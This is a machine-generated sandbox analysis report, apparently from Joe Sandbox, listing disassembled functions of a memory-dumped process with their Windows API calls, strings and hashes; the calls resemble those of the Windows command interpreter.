                                                                                                                                                                                                                          • Opcode ID: 7c20f781a55e9849ae4142fdb2a131a3542540d313720ec3093b2b49b16607b8
                                                                                                                                                                                                                          • Instruction ID: 4421023117e93d8a2cdeae142104e74c2cc05d5842b20b0fadb60079e6a30edd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c20f781a55e9849ae4142fdb2a131a3542540d313720ec3093b2b49b16607b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F21D1B1601204AFEB28AF30DC4EEBB7B6DEF94760F644629F156C21E1EB718C41C621
                                                                                                                                                                                                                          Function 001A38D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                          • API String ID: 2221118986-3043279178
                                                                                                                                                                                                                          • Opcode ID: 4ccb49619dad773d99fbc0c743889dd21308809ca8b9783ac2be56a1804e8fab
                                                                                                                                                                                                                          • Instruction ID: 55cae7af97e2a4f6efdb2c5f8360cb680b06df4d5ff69d3b297c9b888e552e7f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ccb49619dad773d99fbc0c743889dd21308809ca8b9783ac2be56a1804e8fab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA919E796093419FDB34DE50C885BABB3E4BF96304F00092DF999C7190EB38EA45CB52
                                                                                                                                                                                                                          Function 0019BF70 Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0019C1B7
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 0019C1FC
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 0019C28A
                                                                                                                                                                                                                          • longjmp.MSVCRT(?,000000FF), ref: 001ACFB0
                                                                                                                                                                                                                          • longjmp.MSVCRT(?,000000FF), ref: 001ACFC4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2863075230-0
                                                                                                                                                                                                                          • Opcode ID: df4fc24d9bcab18b54db186df397b010b7522515f8461c39821b94d033b725b2
                                                                                                                                                                                                                          • Instruction ID: 9fca8c9f485e2c1cd33ea098d677f3ff8a3f9211ea30459977edfbaf04ff0344
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df4fc24d9bcab18b54db186df397b010b7522515f8461c39821b94d033b725b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF1A279D00215CBCF28CF98C9916BEB7B1BF98700F59821AE856A7784E7716E41CBD0
                                                                                                                                                                                                                          Function 001A26DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A2795
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A280E
                                                                                                                                                                                                                          • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 001A281D
                                                                                                                                                                                                                          • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 001A2857
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 001A290B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                          • String ID: DIRCMD
                                                                                                                                                                                                                          • API String ID: 1405722092-1465291664
                                                                                                                                                                                                                          • Opcode ID: 3bdf40ec09740c5087d0da0ee05dc4c321454db2055812c985df1dbb8fd338d4
                                                                                                                                                                                                                          • Instruction ID: 5993fd9c6b13e8a4212f8f292ea694368f5b3630790b642d21cc2faca63ea696
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bdf40ec09740c5087d0da0ee05dc4c321454db2055812c985df1dbb8fd338d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 467135B5A0D3819FD768DF29C884A9BBBE4BF9A300F10492EF59983250DB348904CB57
                                                                                                                                                                                                                          Function 001A31EA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswdigit
                                                                                                                                                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                          • API String ID: 2770779731-632268628
                                                                                                                                                                                                                          • Opcode ID: 0820db80eb04736603c25562e2ab31ac06b432645a7b2af31c5f34dadcb5d93b
                                                                                                                                                                                                                          • Instruction ID: 2efc31c66d61f509d2043afa3dac8e034f5ce7eb119f78c0bb9bfb55e8e31e78
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0820db80eb04736603c25562e2ab31ac06b432645a7b2af31c5f34dadcb5d93b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77119E3A205212AFE7259F6AE844B7677E9FF9B761320002FF890C7650EB21DC408660
                                                                                                                                                                                                                          Function 001949F8 Relevance: 12.2, APIs: 8, Instructions: 187COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199A11: _get_osfhandle.MSVCRT ref: 00199A1C
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
                                                                                                                                                                                                                            • Part of subcall function 00199A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
                                                                                                                                                                                                                            • Part of subcall function 00199A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001A86E3
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A86EB
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 001A872A
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001A8743
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A874B
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: _get_osfhandle.MSVCRT ref: 00199B4E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001D0AF0,000000FF,001CA7F0,00002000,00000000,00000000), ref: 00199B8E
                                                                                                                                                                                                                            • Part of subcall function 00199B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001CA7F0,-00000001,?,00000000), ref: 00199BA3
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001), ref: 001A87CE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1333215474-0
                                                                                                                                                                                                                          • Opcode ID: 9cf75a6bcde015d77c67dce4810ff189dd6bd6a14f3d942ad80e6a36b9d47733
                                                                                                                                                                                                                          • Instruction ID: 2ac8712d23542d6256ae2d9d5b2bd3cd61e12f40bd580bc9f159deccc4d1413b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cf75a6bcde015d77c67dce4810ff189dd6bd6a14f3d942ad80e6a36b9d47733
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F251F734B41301EBDF28EBB4D89AB7EB7A9EF10714F10452AF502D7681EB70DC418A51
                                                                                                                                                                                                                          Function 00196150 Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 001961E4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3458554142-0
                                                                                                                                                                                                                          • Opcode ID: 891ae5c3f9a3c237d15497e0a980c4e59e6091c14a32d9bd377f4c20e2f07bdb
                                                                                                                                                                                                                          • Instruction ID: 35c25aa257cd7ed4fea157ff44d7aa7f2d7f29102050444f9a19311c4a0362ff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891ae5c3f9a3c237d15497e0a980c4e59e6091c14a32d9bd377f4c20e2f07bdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C391CE74900254AFDB24DF64EC45AAEBBB4FF59700F20842EF806D7690EB719881CB66
                                                                                                                                                                                                                          Function 0019A6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: ELSE$IF/?
                                                                                                                                                                                                                          • API String ID: 2081463915-1134991328
                                                                                                                                                                                                                          • Opcode ID: 5309aaec4eea2ef2a0b9c731a4b0f1b0a9c0dec81005a8bc875c2c82f7d76618
                                                                                                                                                                                                                          • Instruction ID: 86db918c32658c3c7b3bf4e092bca292f48a6174300fdbf28be2b97cde2d5771
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5309aaec4eea2ef2a0b9c731a4b0f1b0a9c0dec81005a8bc875c2c82f7d76618
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F5168326043019BEF38AB75AC47B2B37A4AF96314F55042FE1428B5D1EBB1C889C7D2
                                                                                                                                                                                                                          Function 001A62C0 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A643A: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 001A6454
                                                                                                                                                                                                                            • Part of subcall function 001A643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 001A646C
                                                                                                                                                                                                                            • Part of subcall function 001A643A: NtClose.NTDLL ref: 001A64BD
                                                                                                                                                                                                                          • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 001A63B5
                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 001A63E3
                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 001B1EF4
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B1EFB
                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 001B1F6B
                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 001B1F86
                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 001B1FA4
                                                                                                                                                                                                                            • Part of subcall function 001A640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,001B9C96,001AFDFA,00000000,?), ref: 001A642F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1313749407-0
                                                                                                                                                                                                                          • Opcode ID: deb39b6733ceae01a3a5f23d6fdfc2deeb31b5838b23e8f9a59d41c8d03dc098
                                                                                                                                                                                                                          • Instruction ID: fdbe42720e6947cde3aeb09091d9078dbfb7787cfdb3e8782c22fd1da032b80b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: deb39b6733ceae01a3a5f23d6fdfc2deeb31b5838b23e8f9a59d41c8d03dc098
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0251E335A012299BCF249F659C987FE73A4FF65310F5940ADE909D7240EB70DD86CB50
                                                                                                                                                                                                                          Function 001B9A7D Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001B9AC2
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 001B9B22
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 001B9B32
                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 001B9BAD
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 001B9BB8
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 001B9BCB
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 001B9BF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$CurrentDirectoryModememset$Last
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1725644760-0
                                                                                                                                                                                                                          • Opcode ID: f0692506df5d4ca63cef5458eb7d376818ca2ce31424fc0a2f37d9fddf2c6e21
                                                                                                                                                                                                                          • Instruction ID: f12e71d590a15788f097075492c470162279996481bfb358c5933176fac70803
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0692506df5d4ca63cef5458eb7d376818ca2ce31424fc0a2f37d9fddf2c6e21
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4417D31A01218ABDF14DBA4EC85FEEB7B4FF18310F04819AE905E7290EB38DA41CB55
                                                                                                                                                                                                                          Function 001BB701 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 001BB717
                                                                                                                                                                                                                          • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 001BB72A
                                                                                                                                                                                                                          • RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 001BB7FC
                                                                                                                                                                                                                            • Part of subcall function 00198235: _get_osfhandle.MSVCRT ref: 0019824E
                                                                                                                                                                                                                            • Part of subcall function 00198235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00198256
                                                                                                                                                                                                                            • Part of subcall function 00198235: _get_osfhandle.MSVCRT ref: 00198264
                                                                                                                                                                                                                            • Part of subcall function 00198235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0019826C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BB76D
                                                                                                                                                                                                                          • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 001BB788
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                                                                                                                                                                          • String ID: <
                                                                                                                                                                                                                          • API String ID: 1664749912-4251816714
                                                                                                                                                                                                                          • Opcode ID: ee5fa665b5898c385feb303c97c2c14385bcbbbfa7042aa089199f0dd5ddf300
                                                                                                                                                                                                                          • Instruction ID: 7965f206aca9351c45bfb1fa3bc43a2df4162db19810af7ff0a3afe9e6b829bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee5fa665b5898c385feb303c97c2c14385bcbbbfa7042aa089199f0dd5ddf300
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A312E75D01209AFCB11DFA9D8859DEBBF8EF88344F104016E815E7751EB709A45CB61
                                                                                                                                                                                                                          Function 00194D42 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00194D66
                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00194D8A
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00194D95
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR$p~du
                                                                                                                                                                                                                          • API String ID: 3677997916-4160248025
                                                                                                                                                                                                                          • Opcode ID: 8132b6dd298b11a67795e99f25d12150032dd8e55f3d2fde5ca3e547ce089daf
                                                                                                                                                                                                                          • Instruction ID: 412f047ff928e61ad7c9c3feecd4df059fec958937f2cf48eccfef2db200b357
